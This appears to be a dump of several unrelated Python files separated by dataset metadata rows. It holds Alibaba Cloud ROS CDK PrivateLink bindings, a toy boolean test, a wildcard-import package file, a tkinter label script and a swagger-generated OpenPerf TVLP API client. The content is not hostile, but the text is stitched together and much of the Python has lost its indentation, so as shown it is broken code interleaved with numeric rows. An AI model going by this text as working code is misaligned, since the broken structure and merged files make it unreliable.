'''Attribute ServiceDescription: The description of the endpoint service.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceDescription"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceDomain")
def attr_service_domain(self) -> ros_cdk_core.IResolvable:
'''Attribute ServiceDomain: The domain name of the endpoint service.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceDomain"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceId")
def attr_service_id(self) -> ros_cdk_core.IResolvable:
'''Attribute ServiceId: The ID of the endpoint service.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceName")
def attr_service_name(self) -> ros_cdk_core.IResolvable:
'''Attribute ServiceName: The name of the endpoint service.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceName"))
class VpcEndpointServiceAttachment(
ros_cdk_core.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-privatelink.VpcEndpointServiceAttachment",
):
'''A ROS resource type: ``ALIYUN::PrivateLink::VpcEndpointServiceAttachment``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "VpcEndpointServiceAttachmentProps",
enable_resource_property_constraint: typing.Optional[builtins.bool] = None,
) -> None:
'''Create a new ``ALIYUN::PrivateLink::VpcEndpointServiceAttachment``.
        :param scope: - scope in which this resource is defined.
        :param id: - scoped id of the resource.
        :param props: - resource properties.
        :param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrResourceId")
def attr_resource_id(self) -> ros_cdk_core.IResolvable:
'''Attribute ResourceId: The resource id.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrResourceId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrResourceType")
def attr_resource_type(self) -> ros_cdk_core.IResolvable:
'''Attribute ResourceType: The resource type.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrResourceType"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceId")
def attr_service_id(self) -> ros_cdk_core.IResolvable:
'''Attribute ServiceId: The endpoint service that is associated with the endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceId"))
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.VpcEndpointServiceAttachmentProps",
jsii_struct_bases=[],
name_mapping={
"resource_id": "resourceId",
"resource_type": "resourceType",
"service_id": "serviceId",
},
)
class VpcEndpointServiceAttachmentProps:
def __init__(
self,
*,
resource_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
resource_type: typing.Union[builtins.str, ros_cdk_core.IResolvable],
service_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
        '''Properties for defining an ``ALIYUN::PrivateLink::VpcEndpointServiceAttachment``.
:param resource_id: Property resourceId: The resource id.
:param resource_type: Property resourceType: The resource type.
:param service_id: Property serviceId: The endpoint service that is associated with the endpoint.
'''
self._values: typing.Dict[str, typing.Any] = {
"resource_id": resource_id,
"resource_type": resource_type,
"service_id": service_id,
}
@builtins.property
def resource_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''Property resourceId: The resource id.'''
result = self._values.get("resource_id")
assert result is not None, "Required property 'resource_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def resource_type(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''Property resourceType: The resource type.'''
result = self._values.get("resource_type")
assert result is not None, "Required property 'resource_type' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def service_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''Property serviceId: The endpoint service that is associated with the endpoint.'''
result = self._values.get("service_id")
assert result is not None, "Required property 'service_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "VpcEndpointServiceAttachmentProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
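# --- Illustrative sketch (not part of the generated bindings) ---
# Attaching a service resource to an endpoint service through the high-level
# construct. `scope` is an assumed existing Construct; IDs are hypothetical.
def _example_service_attachment(scope: ros_cdk_core.Construct) -> "VpcEndpointServiceAttachment":
    return VpcEndpointServiceAttachment(
        scope,
        "MyAttachment",
        VpcEndpointServiceAttachmentProps(
            resource_id="lb-hypothetical0001",
            resource_type="slb",
            service_id="epsrv-hypothetical0001",
        ),
    )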
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.VpcEndpointServiceProps",
jsii_struct_bases=[],
name_mapping={
"auto_accept_enabled": "autoAcceptEnabled",
"connect_bandwidth": "connectBandwidth",
"payer": "payer",
"resource": "resource",
"service_description": "serviceDescription",
"user": "user",
"zone_affinity_enabled": "zoneAffinityEnabled",
},
)
class VpcEndpointServiceProps:
def __init__(
self,
*,
auto_accept_enabled: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]] = None,
connect_bandwidth: typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]] = None,
payer: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
resource: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpointService.ResourceProperty]]]] = None,
service_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
user: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]] = None,
zone_affinity_enabled: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]] = None,
) -> None:
        '''Properties for defining an ``ALIYUN::PrivateLink::VpcEndpointService``.
:param auto_accept_enabled: Property autoAcceptEnabled: Specifies whether to automatically accept endpoint connection requests. Valid values: true: automatically accepts endpoint connection requests. false: does not automatically accept endpoint connection requests.
:param connect_bandwidth: Property connectBandwidth: The default maximum bandwidth of the endpoint connection. Valid values: 100 to 1024. Unit: Mbit/s.
:param payer: Property payer: The payer of the endpoint service. Valid values: Endpoint: the service consumer. EndpointService: the service provider.
:param resource: Property resource:.
:param service_description: Property serviceDescription: The description for the endpoint service.
        :param user: Property user: Account IDs added to the whitelist of the endpoint service.
        :param zone_affinity_enabled: Property zoneAffinityEnabled: Specifies whether to resolve domain names to IP addresses in the nearest zone. true: yes. false (default): no.
'''
self._values: typing.Dict[str, typing.Any] = {}
if auto_accept_enabled is not None:
self._values["auto_accept_enabled"] = auto_accept_enabled
if connect_bandwidth is not None:
self._values["connect_bandwidth"] = connect_bandwidth
if payer is not None:
self._values["payer"] = payer
if resource is not None:
self._values["resource"] = resource
if service_description is not None:
self._values["service_description"] = service_description
if user is not None:
self._values["user"] = user
if zone_affinity_enabled is not None:
self._values["zone_affinity_enabled"] = zone_affinity_enabled
@builtins.property
def auto_accept_enabled(
self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
'''Property autoAcceptEnabled: Specifies whether to automatically accept endpoint connection requests.
Valid values:
true: automatically accepts endpoint connection requests.
false: does not automatically accept endpoint connection requests.
'''
result = self._values.get("auto_accept_enabled")
return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], result)
@builtins.property
def connect_bandwidth(
self,
) -> typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]]:
'''Property connectBandwidth: The default maximum bandwidth of the endpoint connection.
Valid values: 100 to 1024. Unit: Mbit/s.
'''
result = self._values.get("connect_bandwidth")
return typing.cast(typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]], result)
@builtins.property
def payer(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property payer: The payer of the endpoint service.
Valid values:
Endpoint: the service consumer.
EndpointService: the service provider.
'''
result = self._values.get("payer")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def resource(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpointService.ResourceProperty]]]]:
'''Property resource:.'''
result = self._values.get("resource")
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpointService.ResourceProperty]]]], result)
@builtins.property
def service_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property serviceDescription: The description for the endpoint service.'''
result = self._values.get("service_description")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def user(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]]:
        '''Property user: Account IDs added to the whitelist of the endpoint service.'''
result = self._values.get("user")
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]], result)
@builtins.property
def zone_affinity_enabled(
self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
'''Property zoneAffinityEnabled: Specifies whether to resolve domain names to IP addresses in the nearest zone.
true: yes.
        false (default): no.
'''
result = self._values.get("zone_affinity_enabled")
return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "VpcEndpointServiceProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
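# --- Illustrative sketch (not part of the generated bindings) ---
# Creating a VpcEndpointService backed by an SLB instance. `scope` is an
# assumed existing Construct; IDs are hypothetical placeholders.
def _example_vpc_endpoint_service(scope: ros_cdk_core.Construct) -> "VpcEndpointService":
    return VpcEndpointService(
        scope,
        "MyEndpointService",
        VpcEndpointServiceProps(
            auto_accept_enabled=False,  # require manual approval of connection requests
            resource=[
                RosVpcEndpointService.ResourceProperty(
                    resource_id="lb-hypothetical0001",
                    resource_type="slb",
                    zone_id="cn-hangzhou-h",  # example zone value
                )
            ],
        ),
    )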
__all__ = [
"RosVpcEndpoint",
"RosVpcEndpointProps",
"RosVpcEndpointService",
"RosVpcEndpointServiceAttachment",
"RosVpcEndpointServiceAttachmentProps",
"RosVpcEndpointServiceProps",
"VpcEndpoint",
"VpcEndpointProps",
"VpcEndpointService",
"VpcEndpointServiceAttachment",
"VpcEndpointServiceAttachmentProps",
"VpcEndpointServiceProps",
]
publication.publish()
| 43.092081 | 274 | 0.676012 | 8,052 | 70,197 | 5.703428 | 0.031545 | 0.039326 | 0.062059 | 0.124379 | 0.929754 | 0.923896 | 0.921806 | 0.91769 | 0.915273 | 0.912137 | 0 | 0.001082 | 0.210351 | 70,197 | 1,628 | 275 | 43.11855 | 0.827407 | 0.211604 | 0 | 0.829268 | 0 | 0 | 0.119711 | 0.039369 | 0 | 0 | 0 | 0 | 0.014634 | 1 | 0.156098 | false | 0 | 0.009756 | 0.029268 | 0.302439 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d75e8cdda844a126d86e5391f5a06866ab1c9dba | 76 | py | Python | tests/logical/OR.py | past-one/rubymine-is2018 | 9b7f38bbcab0b59434e074632e9e2fb9dbd56d29 | ["Apache-2.0"] | null | null | null | tests/logical/OR.py | past-one/rubymine-is2018 | 9b7f38bbcab0b59434e074632e9e2fb9dbd56d29 | ["Apache-2.0"] | null | null | null | tests/logical/OR.py | past-one/rubymine-is2018 | 9b7f38bbcab0b59434e074632e9e2fb9dbd56d29 | ["Apache-2.0"] | null | null | null |
if 3 > 4 or 5 < 10: # true
pass
if 3 > 4 or 5 > 10: # false
pass
| 12.666667 | 28 | 0.460526 | 16 | 76 | 2.1875 | 0.5625 | 0.171429 | 0.228571 | 0.342857 | 0.514286 | 0.514286 | 0 | 0 | 0 | 0 | 0 | 0.232558 | 0.434211 | 76 | 5 | 29 | 15.2 | 0.581395 | 0.131579 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
d75ed40e3c19ebdc37e2ec7210107b403779c963 | 87 | py | Python | moses/organ/__init__.py | rtriangle/moses | 1ef94d32f94f4f1cd7d46a91c76722bfa8a70632 | ["MIT"] | 2 | 2020-07-10T03:09:17.000Z | 2020-07-10T04:28:01.000Z | moses/organ/__init__.py | stephenra/moses | 32dbc64c23bbae23fd964238108aa5c85852d537 | ["MIT"] | null | null | null | moses/organ/__init__.py | stephenra/moses | 32dbc64c23bbae23fd964238108aa5c85852d537 | ["MIT"] | null | null | null |
from .config import * # noqa
from .model import * # noqa
from .trainer import * # noqa
| 21.75 | 29 | 0.689655 | 12 | 87 | 5 | 0.5 | 0.5 | 0.466667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.206897 | 87 | 3 | 30 | 29 | 0.869565 | 0.16092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d7687e6959b1e2f028f05deb4dc5ef8a6da2108f | 503 | py | Python | Location.py | arpansarkar190794/Arpan_Sarkar | b36f66f0ed00668b005fae903ce463883a803fd5 | ["bzip2-1.0.6"] | null | null | null | Location.py | arpansarkar190794/Arpan_Sarkar | b36f66f0ed00668b005fae903ce463883a803fd5 | ["bzip2-1.0.6"] | null | null | null | Location.py | arpansarkar190794/Arpan_Sarkar | b36f66f0ed00668b005fae903ce463883a803fd5 | ["bzip2-1.0.6"] | null | null | null |
from tkinter import *

gui = Tk()

def Name():
    # Labels packed with fill=X stretch across the full window width.
    Label(text='Bangalore', fg='red', bg='white', font=('arial', 24, 'italic')).pack(pady=10, fill=X)
    Label(text='Karnataka', fg='Yellow', bg='white', font=('arial', 24, 'italic')).pack(pady=10, fill=X)

def Name1():
    # Without fill=X the labels keep their natural width.
    Label(text='Bangalore', fg='red', bg='white', font=('arial', 24, 'italic')).pack(pady=10)
    Label(text='Karnataka', fg='Yellow', bg='white', font=('arial', 24, 'italic')).pack(pady=10)

Name()
Name1()
gui.mainloop()  # mainloop must be called, not merely referenced
| 33.533333 | 100 | 0.59841 | 73 | 503 | 4.123288 | 0.369863 | 0.119601 | 0.146179 | 0.212625 | 0.810631 | 0.810631 | 0.810631 | 0.810631 | 0.810631 | 0.810631 | 0 | 0.042056 | 0.149105 | 503 | 14 | 101 | 35.928571 | 0.661215 | 0 | 0 | 0 | 0 | 0 | 0.241309 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d7742e466a3a923966f1e73b826b43872d15c153 | 34,613 | py | Python | tests/aat/api/v1/client/api/tvlp_api.py | gchagnotSpt/openperf | 0ae14cb7a685b1b059f707379773fb3bcb421d40 | ["Apache-2.0"] | 20 | 2019-12-04T01:28:52.000Z | 2022-03-17T14:09:34.000Z | tests/aat/api/v1/client/api/tvlp_api.py | gchagnotSpt/openperf | 0ae14cb7a685b1b059f707379773fb3bcb421d40 | ["Apache-2.0"] | 115 | 2020-02-04T21:29:54.000Z | 2022-02-17T13:33:51.000Z | tests/aat/api/v1/client/api/tvlp_api.py | gchagnotSpt/openperf | 0ae14cb7a685b1b059f707379773fb3bcb421d40 | ["Apache-2.0"] | 16 | 2019-12-03T16:41:18.000Z | 2021-11-06T04:44:11.000Z |
# coding: utf-8
"""
OpenPerf API
REST API interface for OpenPerf # noqa: E501
OpenAPI spec version: 1
Contact: support@spirent.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from client.api_client import ApiClient
class TVLPApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_tvlp_configuration(self, configuration, **kwargs): # noqa: E501
"""Create a TVLP configuration # noqa: E501
Create a new TVLP configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_tvlp_configuration(configuration, async_req=True)
>>> result = thread.get()
:param async_req bool
:param TvlpConfiguration configuration: New TVLP configuration (required)
:return: TvlpConfiguration
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_tvlp_configuration_with_http_info(configuration, **kwargs) # noqa: E501
else:
(data) = self.create_tvlp_configuration_with_http_info(configuration, **kwargs) # noqa: E501
return data
def create_tvlp_configuration_with_http_info(self, configuration, **kwargs): # noqa: E501
"""Create a TVLP configuration # noqa: E501
Create a new TVLP configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_tvlp_configuration_with_http_info(configuration, async_req=True)
>>> result = thread.get()
:param async_req bool
:param TvlpConfiguration configuration: New TVLP configuration (required)
:return: TvlpConfiguration
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['configuration'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_tvlp_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'configuration' is set
if ('configuration' not in params or
params['configuration'] is None):
raise ValueError("Missing the required parameter `configuration` when calling `create_tvlp_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'configuration' in params:
body_params = params['configuration']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TvlpConfiguration', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_tvlp_configuration(self, id, **kwargs): # noqa: E501
"""Delete a TVLP configuration # noqa: E501
Deletes an existing TVLP configuration. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tvlp_configuration(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_tvlp_configuration_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a TVLP configuration # noqa: E501
Deletes an existing TVLP configuration. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tvlp_configuration_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_tvlp_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_tvlp_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_tvlp_result(self, id, **kwargs): # noqa: E501
"""Delete a TVLP result. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tvlp_result(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_tvlp_result_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_tvlp_result_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_tvlp_result_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a TVLP result. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tvlp_result_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_tvlp_result" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_tvlp_result`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp-results/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tvlp_configuration(self, id, **kwargs): # noqa: E501
"""Get a TVLP configuration # noqa: E501
Returns a TVLP configuration, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tvlp_configuration(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TvlpConfiguration
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_tvlp_configuration_with_http_info(id, **kwargs) # noqa: E501
return data
def get_tvlp_configuration_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a TVLP configuration # noqa: E501
Returns a TVLP configuration, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tvlp_configuration_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TvlpConfiguration
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tvlp_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_tvlp_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TvlpConfiguration', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tvlp_result(self, id, **kwargs): # noqa: E501
"""Get a result from a TLVP configuration # noqa: E501
Returns results from a TVLP configuration by result id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tvlp_result(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TvlpResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_tvlp_result_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_tvlp_result_with_http_info(id, **kwargs) # noqa: E501
return data
def get_tvlp_result_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a result from a TLVP configuration # noqa: E501
Returns results from a TVLP configuration by result id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tvlp_result_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TvlpResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tvlp_result" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_tvlp_result`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tvlp-results/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TvlpResult', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
